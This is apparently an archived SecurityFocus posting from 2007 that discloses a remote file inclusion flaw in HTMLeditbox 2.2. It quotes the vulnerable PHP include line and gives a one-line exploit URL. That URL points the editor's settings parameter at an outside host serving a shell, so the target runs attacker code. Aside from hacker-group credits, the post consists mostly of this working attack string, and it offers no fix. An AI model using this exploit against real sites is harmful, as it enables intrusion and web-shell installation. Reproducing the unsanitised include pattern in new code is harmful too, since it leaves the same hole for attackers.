HTMLeditbox & 2.2 >> RFI Apr 25 2007 10:52AM
alijsb yahoo com
+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus